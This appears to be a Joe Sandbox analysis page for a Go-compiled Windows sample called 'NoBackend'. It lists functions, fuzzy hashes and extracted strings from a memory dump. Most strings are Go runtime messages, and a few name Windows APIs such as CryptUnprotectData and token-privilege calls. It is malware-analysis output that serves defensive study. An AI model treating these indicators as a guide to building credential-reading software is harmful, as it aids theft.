, gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [missing deferreturnpanic during mallocpanic holding lockspanic during , xrefs: 00B8868F

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: , goid= s=nil (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type nil keyderivedInitialExpiresSubjectwsarecvwsasendlookup charsetos/execruntimeSHA-224SHA-256SHA-384S$, gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [missing deferreturnpanic during mallocpanic holding lockspanic during $invalid g statuscastogscanstatusbad g transitionschedule: in cgoreflect mismatch untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:length too large()<>@,;:\"/[]?= DuplicateTokenExGetCurrentThreadRtlVirtualUnwindGODEBUG: value "cont$runtime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.semawakeupCryptUnprotectDatanon-minimal lengthtruncated sequencesequence$suspendG from non-preemptible goroutineruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system calltraceback: unexpected SPWRITE function sql: RawBytes isn't allowed on Row.Scantags don't match (%d vs %+v) %+v %s @%dasn1: Unmarshal recipient
API String ID: 0-2363169527
Opcode ID: dfadf35c95c11ac10642cf92b5a620890e04d90defc5ad1aaf8fa57f61de2b9c
Instruction ID: 1ef2b45190259a797432a87bf2b2fbaadb6b3e46a27a855d1e3961d26540bd0c
Opcode Fuzzy Hash: dfadf35c95c11ac10642cf92b5a620890e04d90defc5ad1aaf8fa57f61de2b9c
Instruction Fuzzy Hash: FFD18436208B8087DB14EB25F0817AABBA5F399B90F4845A6EF9D13B75DF78C441CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B360 Relevance: 6.3, Strings: 5, Instructions: 80COMMON

Download Yara Rule

Strings

-> node= ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = bad prune, tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)tracebac, xrefs: 00B5B445
cnt=gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault tab= top=[...], fp:sse41sse42ssse3tls: Earlyparsehostsfilesimap2imap3imapspop3sutf-8%s*%dtext/bad nSHA-1P-224P-256P-384P-521ECDSA (at Classmatchrune inlinefieldsauthorfooterembeds`None`StringFor, xrefs: 00B5B405
runtime: lfstack.push invalid packing: node=out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark p, xrefs: 00B5B3E5
lfstack.push span.limit= span.state=bad flushGen MB stacks, worker mode nDataRoots= nSpanRoots= wbuf1=<nil> wbuf2=<nil> gcscandone runtime: gp= found at *( s.elemsize= B (goal , cons/mark maxTrigger= pages/byte s.sweepgen= allocCount end tracegcbad g0, xrefs: 00B5B46F
packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes --%s%s: %swsaioctlCurveID(finishedexporterReceived[::1]:53continue_gatewayinvalid address readfromunixgramif-r, xrefs: 00B5B425

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: -> node= ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = bad prune, tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)tracebac$ cnt=gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault tab= top=[...], fp:sse41sse42ssse3tls: Earlyparsehostsfilesimap2imap3imapspop3sutf-8%s*%dtext/bad nSHA-1P-224P-256P-384P-521ECDSA (at Classmatchrune inlinefieldsauthorfooterembeds`None`StringFor$ packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes --%s%s: %swsaioctlCurveID(finishedexporterReceived[::1]:53continue_gatewayinvalid address readfromunixgramif-r$lfstack.push span.limit= span.state=bad flushGen MB stacks, worker mode nDataRoots= nSpanRoots= wbuf1=<nil> wbuf2=<nil> gcscandone runtime: gp= found at *( s.elemsize= B (goal , cons/mark maxTrigger= pages/byte s.sweepgen= allocCount end tracegcbad g0$runtime: lfstack.push invalid packing: node=out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark p
API String ID: 0-1503843357
Opcode ID: 621bc1a47bfe25924a58ec51976c97925e63ad42ff26994b160c6392f4f18099
Instruction ID: 716fd074763f65c20db1d9557174211d6f4d054f3f27d7f0e1918e7dbbecff68
Opcode Fuzzy Hash: 621bc1a47bfe25924a58ec51976c97925e63ad42ff26994b160c6392f4f18099
Instruction Fuzzy Hash: 0F213E36225B84C6DB10AF50F881369A7A8F789B84F8C59A1EE9E17726DF38C405C754

Uniqueness

Uniqueness Score: -1.00%

Function 00B8EF00 Relevance: 5.7, Strings: 4, Instructions: 744COMMON

Download Yara Rule

Strings

findrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=unpaired removeDep: no %T dep on %Tsuperfluous leading zeros in lengthform-data; name="%s"; filename="%s"zip: unable to , xrefs: 00B8FADB
findrunnable: netpoll with psave on system g not allowednewproc1: newg missing stacknewproc1: new g is not GdeadFixedStack is not power-of-2missing stack in shrinkstack args stack map entries for invalid runtime symbol tableruntime: no module data for [origina, xrefs: 00B8FAEC
findrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruptiondecryption failed: %wsequence tag mismatchAdjustTokenPrivilegesLookupPr, xrefs: 00B8FB0E
findrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of r, xrefs: 00B8FAFD

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: findrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of r$findrunnable: netpoll with psave on system g not allowednewproc1: newg missing stacknewproc1: new g is not GdeadFixedStack is not power-of-2missing stack in shrinkstack args stack map entries for invalid runtime symbol tableruntime: no module data for [origina$findrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=unpaired removeDep: no %T dep on %Tsuperfluous leading zeros in lengthform-data; name="%s"; filename="%s"zip: unable to $findrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruptiondecryption failed: %wsequence tag mismatchAdjustTokenPrivilegesLookupPr
API String ID: 0-211657379
Opcode ID: 03f8247261336ea2c203c80d2cf4296962eadfbd7ce54dd3fe0305535aae5021
Instruction ID: ff6f640766d927f50f1a337978b5ebe5f320fba3bbc0559af4619a95a0692fea
Opcode Fuzzy Hash: 03f8247261336ea2c203c80d2cf4296962eadfbd7ce54dd3fe0305535aae5021
Instruction Fuzzy Hash: B462AF32709B85C5EB25AB55E4803EAA3A0F789B90F489076DA8C17B75DF7CC885CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00B69EE0 Relevance: 5.3, Strings: 4, Instructions: 312COMMON

Download Yara Rule

Strings

flushGen MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nan, xrefs: 00B6A3B5
p mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not foundpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valuewirep: already in go, xrefs: 00B6A3F8
!= sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase, xrefs: 00B6A3D0
runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64, xrefs: 00B6A39A

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase$ flushGen MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nan$p mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not foundpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valuewirep: already in go$runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64
API String ID: 0-3993034679
Opcode ID: 1326e762be0c6fe8a966213fe390dc970a38f76e41117d97353824e7b0d278dc
Instruction ID: 397cae4de1ee6e47ca1d46ff6e1554b8d5088e2487117349f64d4f044cacc9d3
Opcode Fuzzy Hash: 1326e762be0c6fe8a966213fe390dc970a38f76e41117d97353824e7b0d278dc
Instruction Fuzzy Hash: 5AE1D232709B40C6EB14DF25F4803AAB7A5F389B90F448666EA9D43BA5DF7DD484CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00B8BE40 Relevance: 5.3, Strings: 4, Instructions: 266COMMON

Download Yara Rule

Strings

runtime: casgstatus: oldval=gcstopm: negative nmspinningfindrunnable: netpoll with psave on system g not allowednewproc1: newg missing stacknewproc1: new g is not GdeadFixedStack is not power-of-2missing stack in shrinkstack args stack map entries for invalid , xrefs: 00B8C207
casgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additional frames elided...unsafe.String: len out of rangesql: duplicate driverConn closetls: unsupported public key: %TTLS: sequenc, xrefs: 00B8C24F
casgstatus: waiting for Gwaiting but is Grunnablecrypto/tls: ExportKeyingMaterial context too longtls: server advertised unrequested ALPN extensiontls: server sent a cookie in a normal ServerHellouint64 values with high bit set are not supportedinternal error:, xrefs: 00B8C1BB
newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes --%s%s: %swsaioctlCurveID(finishedexporterReceived[::1]:53continue_gatewayinvalid address readfromunixgramif-rangeNO_PROXYno_proxynet/httpgo/buildx509sha1bad instMD5+SHA1SHA3-224SHA3, xrefs: 00B8C225

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes --%s%s: %swsaioctlCurveID(finishedexporterReceived[::1]:53continue_gatewayinvalid address readfromunixgramif-rangeNO_PROXYno_proxynet/httpgo/buildx509sha1bad instMD5+SHA1SHA3-224SHA3$casgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additional frames elided...unsafe.String: len out of rangesql: duplicate driverConn closetls: unsupported public key: %TTLS: sequenc$casgstatus: waiting for Gwaiting but is Grunnablecrypto/tls: ExportKeyingMaterial context too longtls: server advertised unrequested ALPN extensiontls: server sent a cookie in a normal ServerHellouint64 values with high bit set are not supportedinternal error:$runtime: casgstatus: oldval=gcstopm: negative nmspinningfindrunnable: netpoll with psave on system g not allowednewproc1: newg missing stacknewproc1: new g is not GdeadFixedStack is not power-of-2missing stack in shrinkstack args stack map entries for invalid
API String ID: 0-38089095
Opcode ID: ebdb1e6abfed3aa7a95265305e54d8cef997d84fe4468110619ec177aad3a31b
Instruction ID: e4c92befefad58d4c63513d120a32ddb0f39a2620864e5bd52461647da7b24b1
Opcode Fuzzy Hash: ebdb1e6abfed3aa7a95265305e54d8cef997d84fe4468110619ec177aad3a31b
Instruction Fuzzy Hash: 7CB1B636605B84C6DB14EF25E4853AA7BA1F34AB80F548662DF9C43776CF79D481CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00B88A60 Relevance: 5.2, Strings: 4, Instructions: 224COMMON

Download Yara Rule

Strings

runtime/internal/thread exhaustionlocked m0 woke upentersyscallblock spinningthreads=gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff RegLoadMUIStringWdQw4w9WgXcQ:[^"]*integer too large060102150405Z0700multi, xrefs: 00B88C54
runtime., xrefs: 00B88C1B
bad restart PC-thread limitstopm spinning nmidlelocked= needspinning=store64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine RegSetValueExWdata truncatedunreachable: Module32FirstW.WithDea, xrefs: 00B88D45
reflect., xrefs: 00B88C7B

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: bad restart PC-thread limitstopm spinning nmidlelocked= needspinning=store64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine RegSetValueExWdata truncatedunreachable: Module32FirstW.WithDea$reflect.$runtime.$runtime/internal/thread exhaustionlocked m0 woke upentersyscallblock spinningthreads=gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff RegLoadMUIStringWdQw4w9WgXcQ:[^"]*integer too large060102150405Z0700multi
API String ID: 0-2857264206
Opcode ID: b22fbee41be43a4b65cb3289cdc1768de9244f35817120753f9e2035a6eecb2e
Instruction ID: bdb77dcaf000841158de084e228b491a2af745c03459db8dbed9c3e23dcd5b7f
Opcode Fuzzy Hash: b22fbee41be43a4b65cb3289cdc1768de9244f35817120753f9e2035a6eecb2e
Instruction Fuzzy Hash: 2271B472705A4087DB24EF20E4803AEA7E0F795B94F9885B5DB9D47768DF78C891CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00B706C0 Relevance: 3.9, Strings: 3, Instructions: 179COMMON

Download Yara Rule

Strings

pacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not foundpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valuewirep: already in goselectgo: bad wakeupsemaRoot rotateRight, xrefs: 00B708C6
(scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type nil keyderivedInitialExpiresSubjectwsarecvwsasendlookup charsetos/execruntimeSHA-224SHA-256SHA-384SHA-512Ed25519M, xrefs: 00B708E5
MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:, gp->status= pluginpath= : unknown pc called from RegDeleteKeyWRegEnumValueWempty integer, xrefs: 00B70945

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

